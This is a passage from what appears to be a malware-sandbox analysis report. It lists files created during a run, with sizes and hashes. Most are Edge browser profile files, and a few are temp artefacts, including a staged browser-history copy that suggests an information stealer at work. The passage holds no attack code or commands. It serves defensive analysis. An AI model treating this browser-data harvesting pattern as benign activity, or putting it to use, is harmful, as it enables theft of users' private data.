                                                                cc6186b5115525964b454ef070e9034df1d919d806314ee6a2203a2d66b4f7b3

                                                                SHA512

                                                                b0be05f9536efd3ee010afef24fe879aeabe56cd52c877cc23980b8c1742823834f2e9e8c000a78d79b077d0f257dc30bff10b5eb5bfa6d2cd684405bfec7c0f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

                                                                Filesize

                                                                747KB

                                                                MD5

                                                                caf3270e6712a05fa98d2906767fea61

                                                                SHA1

                                                                dac8ff2f4df3d5f8cb11540a08d526ecdf6276d6

                                                                SHA256

                                                                31fc03c0de46fb6f87bb3ee52ec768a9e707eaedf6d635eae2f53b5cb12beb0c

                                                                SHA512

                                                                dc20a621348b2de52dd542f8f655961e855fef93c2c37d459609cf06d18ea1ce44d7c23406e94a6c2fe05a8361658af9ea9930e59c11a4ba5b7bc2dc37960c63

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

                                                                Filesize

                                                                32KB

                                                                MD5

                                                                3d717fa891fbafdbacf93bfb48918058

                                                                SHA1

                                                                69cf09b669444cbfe0ab7e6aee2a3e59b200aed3

                                                                SHA256

                                                                1c634d8a1954c3773d6a808709d6dbf14d8a20fdf1b52a8394a223ff335cfe8c

                                                                SHA512

                                                                dc335aec55d258b1931bc2a9c9b699ea971f9b0277f9e6b660ad6d4c5c2aeb9d41860e81da94bef9984845bee3d1ab5efd34cbca70820bac3bdf5cbffc97b0f0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

                                                                Filesize

                                                                32KB

                                                                MD5

                                                                81e8f8281ea972cee3cd3ee2ff4ed42b

                                                                SHA1

                                                                6877e2f5e3c97294610f5d92c53982b3f6db008a

                                                                SHA256

                                                                8a6aea6739ad1bc5c58aa123796b46a9334f2880fc3c3948cd00abc6ed2e5e9c

                                                                SHA512

                                                                615a131732c448342706cc049874cac0ec523271d6c8dfa600a3ba8626ec52c92fbd5ba8ba1ebd2ee51497dc6ef96d433a8d6eda45611cc7b00fe365dbe3b49d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                Filesize

                                                                816B

                                                                MD5

                                                                0f56b4a9e0b2e4bd18f1269b6e9af8c9

                                                                SHA1

                                                                87362f1dacf5dc31deddc432edade893a010245a

                                                                SHA256

                                                                1cfc5603f4ab0c48c24984b918edb0673e9a272d3b747aca8a680e9e03489bac

                                                                SHA512

                                                                c901f5d0293dbe1b20bc01a45a18c416749350653692423fe8cacd7505acdf177a1d5aa1bd31a7b81eef6fe19822b68c8b905016a311a1a86b0f26d15e27a602

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001

                                                                Filesize

                                                                41B

                                                                MD5

                                                                5af87dfd673ba2115e2fcf5cfdb727ab

                                                                SHA1

                                                                d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                SHA256

                                                                f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                SHA512

                                                                de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                Filesize

                                                                124KB

                                                                MD5

                                                                6610197858baa49daba50a4ab5ad2dcc

                                                                SHA1

                                                                55709a9f0978dc929eb3898e50426dfac32772c1

                                                                SHA256

                                                                7520c4f198ebf1247cbc754a5c591a4542bfa564100a0abff061ff86189a65bb

                                                                SHA512

                                                                d508003f6bd6fba9d0eb37e573e13ec16138f8e748fed0d34fe62051f70bcc89fd50e591c0815c326f309868711047f52f008bb1f322462879fba90aa18fa9b6

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

                                                                Filesize

                                                                23B

                                                                MD5

                                                                3fd11ff447c1ee23538dc4d9724427a3

                                                                SHA1

                                                                1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                SHA256

                                                                720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                SHA512

                                                                10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                cde4d3e52260588b6083e5bf2958ca5b

                                                                SHA1

                                                                de3f8ce3a01853544e9107956d0a66435018fa79

                                                                SHA256

                                                                1a6ef367e19f8dbb958d1575898826a74eda6136aba2fbefc13936b1779a332d

                                                                SHA512

                                                                5f19a3bb8b8475ab18f84b6adf95e83dbb75a6ca3db437c151bcd8feae4fb21d1001d8e3fde2cc94217b6b69eb3c430a6459969e7cf68922290c8b7e7e6fe78c

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                b13fba437a3ad510aea987d8349ad57c

                                                                SHA1

                                                                e7c49cba92901cdd032202a5514d7cf45213b208

                                                                SHA256

                                                                20af9f2c100b9d695bdcefafa318c99b09b8a36ac263f317ef30eaa3f65ab435

                                                                SHA512

                                                                db6eba94344a2609caa2ab51c8702fbb3642834296d69236dcb6ce27a6ac61f4a87683eb10bbc214f6a854703bcb32fdd331e03d3cb3edf21fb198d159c463dd

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                304ef90b08c7e6fe9d11c0edcc5a8b51

                                                                SHA1

                                                                1b3c33faf459ca076dd2f84dfc8f39562e0b352c

                                                                SHA256

                                                                9e31c6b6a7d4c21460323f8271ef38601753c8ebadfe7f266e5a440bea71d4bc

                                                                SHA512

                                                                b55180179bb7a9b10cca7fc20e28b576e5baf7913b2e25a8eadfa9730c6a7036e1772c36edcaf843d79f75a96272432cb04cb585880685c125c3f69eca4cf1d0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                d0c99b901cec1fd0668d3ebd6b3bf2ba

                                                                SHA1

                                                                a77b5689aea8f1829a87add5d0cb8000cbfdba1b

                                                                SHA256

                                                                d94b14625652a417ac795204330306ae19d84e81ca22f14daa6aa95d00b52a1b

                                                                SHA512

                                                                ce4646513b9213aba23ec6f3e14d46e926109506665a5b872fbbc14a6c2e418c81c63bce1744b6b462997896d8ef0b5f3ec30acdd97c2b0bc7053a531016b38e

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                62909d6074c1fa06e791002a069cb4c1

                                                                SHA1

                                                                30da198bbb173e6bd838358ecf65558413938a59

                                                                SHA256

                                                                be3072d8c5a3e7a9c0b196cd4cb799fe501ebdb63636d796a092d568b0dbfd8d

                                                                SHA512

                                                                1185f60cd9dfc5a2598c37db6c7565083c0d9db30e7226ca9629a500f75207545429875560a298ecb255469962a422692e5305ffcbe618b14a42c15285e037e7

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                646f0b94650ecf98cf3bbbc49b4832f3

                                                                SHA1

                                                                5bab2e01177a70da8152752e7f9ab13f8e47d50e

                                                                SHA256

                                                                a530fb88694396cad9930d4691375d50223fcb6f684f95b4d4e6672981acc9eb

                                                                SHA512

                                                                355d45c87c6c4ee4c99067a8561fab23f24d3af76be560d06ca310aef9934327824f7382dcbfd826281d05058121819e0fdc3b1005bf79df92bc0300d8c2a195

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                98e5a95d3b2c13785d620169efa36b6b

                                                                SHA1

                                                                88ec6dcc568ab213a176c715fbde38073ba2fdcb

                                                                SHA256

                                                                27fec60ef60fc9a50b3c90cf9b9f3046712369de5b1e0eaf333ac51635bcb412

                                                                SHA512

                                                                01333aa011edc45e5ab83c5b262f18463d00ddc8d27937db651df1ec5b21a250c9314a0dcef796145035620afbda0c3807269237fa86a7d7a4defd93ed7b021f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\19785922-e24c-4bb1-a01f-c03378ca7e70\index-dir\the-real-index

                                                                Filesize

                                                                624B

                                                                MD5

                                                                81e4f0c3d0f662ddf319df53be8d68f8

                                                                SHA1

                                                                040d234fa4797949357abe9ccfa4f65f688e6dfc

                                                                SHA256

                                                                744c86a8c022fcc929e0fd003bd3fa0f3d4cd041041e5eb68e50ff76412c4fdd

                                                                SHA512

                                                                961a1d783991ae5cf426f774cb942ed4a751ad91aca477ef89b226f07d4a611d88baf72c7893f10fb11b3198d838444411440df15d0a2ecf1ad747bd22474f9d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\19785922-e24c-4bb1-a01f-c03378ca7e70\index-dir\the-real-index~RFe57dacf.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                11363ef54a3598dcd092f626c2dbfcb7

                                                                SHA1

                                                                880f6d855f9c638d3d1befb4c64fdcf0aed019cf

                                                                SHA256

                                                                bb9c4ec023d14e43b56299568ec5006edb6a03a8a7c8e07eaa22389d3d8cd313

                                                                SHA512

                                                                6ad97bb30fdda927a19d50af8fcb18bcea81e6df4ee971a95ce9ae820077954cc0c49406ccb3aca9eeb4d91791011e4a564f32361399435862ba3f7155dd8570

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\88ffdf12-9796-43c9-8902-a583f627e99a\index

                                                                Filesize

                                                                24B

                                                                MD5

                                                                54cb446f628b2ea4a5bce5769910512e

                                                                SHA1

                                                                c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                                                SHA256

                                                                fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                                                SHA512

                                                                8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\88ffdf12-9796-43c9-8902-a583f627e99a\index-dir\the-real-index

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                721f555e48fc10f868e85a9acbdc9a61

                                                                SHA1

                                                                10391c020db468dbfec4d401f64a1d6b118df55c

                                                                SHA256

                                                                2f5abfac316ee0e14622aa9c3d3b7b065402c14be30c30413809afae58055ddd

                                                                SHA512

                                                                bfcde54004f15be80ac8aa667f0f38150bcfec673a0efd0f46702426a0ae69036b5a9645153319c9c35267a5e1fee794069bb07e5339b87d1aec3257f92d7ed7

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\88ffdf12-9796-43c9-8902-a583f627e99a\index-dir\the-real-index~RFe5800f5.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                b05734e70f0edbfc17668a2a811d09ce

                                                                SHA1

                                                                85f04115711daa0ed2f3b277f8254e8985bedf63

                                                                SHA256

                                                                3d2d780f7198d5edee3a462709ea88f9ed0869e5b49ef3324313c5c2341dc1b3

                                                                SHA512

                                                                ddbf19f4112abd97c01eaf39957534b81bca0bf8116339dce86b11285496b522c93845853b096acbdc9abb61652ad01b346a32144f72786d3eb9642c9734d285

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\cfb5c399-9f60-49b3-9f4a-bc4064fd26d7\index-dir\the-real-index

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                fbc115ad70e208d86ae4a472de6b9508

                                                                SHA1

                                                                1f4e6528850fdcf5e2628ac97f8b0ac68c5dc440

                                                                SHA256

                                                                6b52bfd315284e75c4d474b453b127936020e046609064976c8725b69ac85ac7

                                                                SHA512

                                                                98c2b7aee76e08fb9e890534cbea319a85526ac7c6fac2c9d469474ce89fcb13aee5e6862bcd05ccea1beaeb9909283bf68e223ea2b5b95c654780c565e389be

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\cfb5c399-9f60-49b3-9f4a-bc4064fd26d7\index-dir\the-real-index~RFe57803c.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                2153a9ad8490b40b8f95b8419480594a

                                                                SHA1

                                                                cc7d34b148924cf768b1169e8c14dac9a2ed3b9d

                                                                SHA256

                                                                0e9f4536d7286396d91fe08f3b9a0b1f92f2f9b955261410dbde0aec72660d1d

                                                                SHA512

                                                                de7f5744a041097da403ef9ec147ebe96a0751d4edea231c506fd22cdeefff580bcd0bc58f636d6d208fd8af8562446466cc3c3da3ee2cfc291264a172fcfd95

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                89B

                                                                MD5

                                                                002642bcb7cc56ca1b56f4b37c33cbe1

                                                                SHA1

                                                                649f08e9d77758ec61139aa9a17ed96880e4b223

                                                                SHA256

                                                                3848b5cb37c93b48bd5400a11f0a3f209bf7321cbf6f1cf6cd7e85eef149addc

                                                                SHA512

                                                                e74df9672db5adb3d1de939998b07453933481d49ab572108928d0f403a538b99ef4e74c2a5754b6f3d80ecf318319301f0839a8b08a814450dc51a266f4ec37

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                146B

                                                                MD5

                                                                1232454f4e765a0a4c862cf2d175540a

                                                                SHA1

                                                                ac3f1b0a8d5d21ada3f53e1a7e761ec9b2cf44d9

                                                                SHA256

                                                                c825e7ae3c9acfd3d3adc6482f4257bfef14e1f012ab416ae7341e667d798e28

                                                                SHA512

                                                                652a8a20aaba9501691daa33ce2b2621383e69353fc581940e46f5adfc453b71991f9cd6359fae48833d297937322782f34a93c6cc987f88dd904ac432596428

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                89B

                                                                MD5

                                                                41c5467f259c4e3b46f7b10f5e57cd84

                                                                SHA1

                                                                9a122d7192943ee3303aaed36c458ec24d6f6e8e

                                                                SHA256

                                                                f3aa057c13eb344dcc5ce7338bfb863d6ef6d1e28e16762fce8852aca0d708b5

                                                                SHA512

                                                                5ae70cabcaeee209f7cb11d72f3ea69bbde556eaf20e36b6809fe235102ff3e4447f6a12063a5b96dd6f5e9c59a72ce2f4e4cef25be552d458e6ab7fe29d1112

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                82B

                                                                MD5

                                                                c728a00fadd1ee9cbe3860c708cb19ca

                                                                SHA1

                                                                8fefde5930c1dbc38f6df99e79138aecfbcc0dff

                                                                SHA256

                                                                28007c833b80a4ef31400806bae7444172e31e900b16574edf0339ea71ead5fa

                                                                SHA512

                                                                ea231976eb5a84bd490d68011e0bec6a42e288a2f593783d1aef7b8f581af48ec4b0b604f7016748cc4a3bc30726e327bbe8f20687b87fc91b6373c35ee4ce10

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                146B

                                                                MD5

                                                                db82be6e2a21bc31a1ae8261dcfdacfa

                                                                SHA1

                                                                dd89d7ee6650289d9b8af1fdb437b97cdf80e0d3

                                                                SHA256

                                                                45a1db15e799b73cbd064c8774a71b79d4692a4e6afab29f5bb5d79d7dc28d85

                                                                SHA512

                                                                f2b07bc3a35657ed7ad8b24db07384afd2d72280dc28e315f7ab8afc4c86891f077966bc4e8a619564e6ed733e7e98e132bcf6ff9c306d78644c22cc1aa8a531

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                156B

                                                                MD5

                                                                a343d040d255da3596557f74a9850861

                                                                SHA1

                                                                9c75da3d8fb6f756cd0786da87f8b8ba2767a3af

                                                                SHA256

                                                                0f075fd27d87fe0ba328219476d56aa51f6a75cd999bc149cd49df9e7d2d1066

                                                                SHA512

                                                                be93f0423a50a645e29db9cbe47349095e75c1d8366efea2d648d37849d7cda70eaab2dcaf6043cc803397956016c2d50b98f49e131e0040ab8d85d60ea08b6a

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                26B

                                                                MD5

                                                                2892eee3e20e19a9ba77be6913508a54

                                                                SHA1

                                                                7c4ef82faa28393c739c517d706ac6919a8ffc49

                                                                SHA256

                                                                4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2

                                                                SHA512

                                                                b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                153B

                                                                MD5

                                                                beed8ce2bbf87672eb2fa0ebbbff2bc0

                                                                SHA1

                                                                672c686424aa96d58dbc435562bdc5147601d240

                                                                SHA256

                                                                77004286e8d18126653bd2bcab124c2f94a1cddcb83375f3fd6e76524d3ebcfe

                                                                SHA512

                                                                e60ab2de13bfb9137f6a005c4c6602962eb9749d938fc192f5daea9191907026e6b6a56ea99033cc40e55040e179c8405a38f33ff820bf03f03c1ec318ac93a5

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                Filesize

                                                                82B

                                                                MD5

                                                                43e79322edeab0d68c7617bfe8778532

                                                                SHA1

                                                                c878f24e0d2bea95e3991f94f484d18899270d02

                                                                SHA256

                                                                1ebe9cbc4e36bae1e8cb9cefab4aa34f0db52dd56cd9b720d3679e7f0b33dfbe

                                                                SHA512

                                                                ebc69921c5aee769b73349c07c39392684230c1fde032e84e5c405518b5b67876b322beec0d62687c3593310d85c0925ea350125e6f8dc2b37a1cffaf920f817

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

                                                                Filesize

                                                                16B

                                                                MD5

                                                                46295cac801e5d4857d09837238a6394

                                                                SHA1

                                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                SHA256

                                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                SHA512

                                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                Filesize

                                                                120B

                                                                MD5

                                                                8dacea7d4e3596eb84aec7ff84927676

                                                                SHA1

                                                                ccd83b140476aaf5684f73426ef23d414f39193e

                                                                SHA256

                                                                d94fdacf1adf06934e616141a5cf82712e21763d53d7189b051f02baa1fc836e

                                                                SHA512

                                                                375bbcf4b97d95f1b5d053445a1f445d559d3659e096bf0e9cff170c06a33561b58dd57ebe5fc6e47d65db4c6623913a378d014b24c11eaf2bc780cce34fef8e

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                Filesize

                                                                96B

                                                                MD5

                                                                e86dcd88fd4ecf698007da083e582653

                                                                SHA1

                                                                2e15a0c748477d193218d7f9f8af705cd76b36cc

                                                                SHA256

                                                                2ab14b3892e145ba42adb9777908a8353969be5c91d00d55f36f6905085f83ac

                                                                SHA512

                                                                17d857455f2a39be015170cef40886ae7831b36222fd356161295d4653a217395aa8434dbc4a777e8b08da3b69db737f9309529456c80ec3443619166f584916

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d273.TMP

                                                                Filesize

                                                                48B

                                                                MD5

                                                                868a9f9ed29319c7a62854b028e38f7e

                                                                SHA1

                                                                bda28a3efee725f668093aa4090d59c065110281

                                                                SHA256

                                                                d6074d5d1f49c253ebec9bad74809b827fea6a131dc41acbbda0547396859898

                                                                SHA512

                                                                da901ae2915786bb660afaf80cb0bb14e7883108f5df00ebd4d61acf50e244c14b78071f8cedc80f4f028f64419b5d7659c594a7082a9f5e4ecc53fafeac65e8

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                99eaf2996fac72bad116e93f63ca0623

                                                                SHA1

                                                                02bf769f4b860ba772df657383c7fb2b6f953187

                                                                SHA256

                                                                f69f6db383875828e6dba2c9c072afdb61867822b1a790dad9b9c094292b034c

                                                                SHA512

                                                                75ff32282f1b10f5d11a4e7cd2e496b1967614be8a2ab752e443084a6a6d8bf963caed30805404481242d5c7ca9d74e72518549a3e317dd9eabfec5400d308a4

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                706B

                                                                MD5

                                                                30ab5da35d918150c2902faa026e00cd

                                                                SHA1

                                                                f69dad3dfd6fd94521308cfc283b5d4a2888f6c2

                                                                SHA256

                                                                86660d230badfe4b2634fd05558e7342140f10e445fb8c97ab3cdbdc6a8a0843

                                                                SHA512

                                                                984f67339e7b112de3c3749223a3d23b36343dee9ab2c672b771b1d4091d72bf05b13ca6bcb958f972fc8af0a3d4dc763ce82422251affbca126deadbc101e88

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c052.TMP

                                                                Filesize

                                                                706B

                                                                MD5

                                                                b8964eed2a76ca4fa183efc3086a74a4

                                                                SHA1

                                                                23add33f777ae267cfa3bee0175c692983dbd7a5

                                                                SHA256

                                                                fd7fa9acd30e3d4f7762984d118d8ddabb08ef68421c5c92861380eef087164e

                                                                SHA512

                                                                562b9014c2e0f96a3ea976bf5e1c92121fba8ab420723927e42fd0a47c4758a468a107c3e415efcac811929419f37561129f7ca67170bdd29a60adda588477d9

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                Filesize

                                                                116KB

                                                                MD5

                                                                42922b52c94ea18af6adac91008d1c03

                                                                SHA1

                                                                4a5f3014cf63c038aa8de34bfeca96f6e9794ce8

                                                                SHA256

                                                                ba50e3a0648cf36c0839a7e57baeef69384040a8c1f725507d87419556f31e5a

                                                                SHA512

                                                                25b71b0d460edaeabdbd187f8c88dca6c5e340b770da1b249d6e6d246f6a2b24b4a95931708a253d176ad50278c930bf8c27041edb09b10d32a66c463e14f73e

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                Filesize

                                                                16B

                                                                MD5

                                                                6752a1d65b201c13b62ea44016eb221f

                                                                SHA1

                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                SHA256

                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                SHA512

                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                11KB

                                                                MD5

                                                                c0866ee5a3be1c4b7be318648be2ba34

                                                                SHA1

                                                                ad11ce202292c0682c982d89bf82723482161251

                                                                SHA256

                                                                5b5396fee695a89ec7716dbe794c1f9f02c63238ee294d9ddf36a9220f9f8ff3

                                                                SHA512

                                                                c9bf9ef38175ff76ffd32bb2b2801d4b47064723f4b2d17efe7222645346589592854261559f22ef81bab7dff1387d55741b690be2e7921c6f69509721ff872e

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\a98ca0c6-5f31-446a-be42-d5d95c2c7676.tmp

                                                                Filesize

                                                                10KB

                                                                MD5

                                                                24b92ffddd7ab9218fc397a1d534c0a7

                                                                SHA1

                                                                176cbcda0f7b4fe532b1e3d9ccaf72ac761152cd

                                                                SHA256

                                                                4ec70b61edc57dad4b248d38690ad9b04039a791020920083f66daeefa94e86c

                                                                SHA512

                                                                b896d19fbe182ce4ba67482f0f497ddf9d6163ebc7cc283e64d5116052473c53034d1d892d473810b0149ae1644a6bc4b7ae5d77956a38adb1d5dc9261d4da4a

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                77d622bb1a5b250869a3238b9bc1402b

                                                                SHA1

                                                                d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                SHA256

                                                                f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                SHA512

                                                                d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Filesize

                                                                944B

                                                                MD5

                                                                34f595487e6bfd1d11c7de88ee50356a

                                                                SHA1

                                                                4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                SHA256

                                                                0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                SHA512

                                                                10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                              • C:\Users\Admin\AppData\Local\Temp\RESCE28.tmp

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                f24e95b6fa5a5d2778f42b7bae841fba

                                                                SHA1

                                                                450e040b4e4a28b2f47fb9aade0aa15514029276

                                                                SHA256

                                                                5ae0b469e0724cc4dd2c6cfe12ddec6eaf4197d6f4c02592e209b8eba8f1ad9e

                                                                SHA512

                                                                bfb1c6ffc2d99330ff33787cbf08941e177d99d3771fc926023bc65e5fe047077497d0ea65e5e9cc1a292d704d89d2904b9ba24863795a2af54a549fcd03338a

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gd0tg1wl.4ou.ps1

                                                                Filesize

                                                                60B

                                                                MD5

                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                SHA1

                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                SHA256

                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                SHA512

                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                              • C:\Users\Admin\AppData\Local\Temp\browsers-temp\Admin\Edge\Default\history.txt

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                badd41f3d8408c99d8b8bb1227dda651

                                                                SHA1

                                                                e4e7e5b681dade95f3c314df1dca17a95a4ab5ab

                                                                SHA256

                                                                c7931e750692afc45b200704a6759ef7840b67b31c1417764a8f7d6214bb3d8c

                                                                SHA512

                                                                aa7ae2f65aceac1182ec00d8e2b9f5efcf84ce63b70cc70c4b5beb58a45384020183f3b8f103218d20fb18c6a8b201649589726fe91ce0c58b137c02d205eb1a

                                                              • C:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.dll

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                557fb66fbbd753cdc09c267cc406a436

                                                                SHA1

                                                                877744ee07e13ed4c6a67da2b7c992f1e3d92dc9

                                                                SHA256

                                                                de60e7ec3867e636573801baff6c1df81af94bd5ca2f83168cd9c4e39d2d13a6

                                                                SHA512

                                                                26bae46b3b985f0d57e815a82816f196fd397a346b79b91f51aa9d85bd61ff466598b9d15b5648241c40c54646ea2bf85ba2bca1c235545cf1d11cdc25cf697d

                                                              • C:\Users\Admin\AppData\Local\Temp\w85c5s8Us3\Display (1).png

                                                                Filesize

                                                                249KB

                                                                MD5

                                                                b056b8aa52aa0585f40938cd87a11202

                                                                SHA1

                                                                f610041b034734b949cc7730654f43a14abf815a

                                                                SHA256

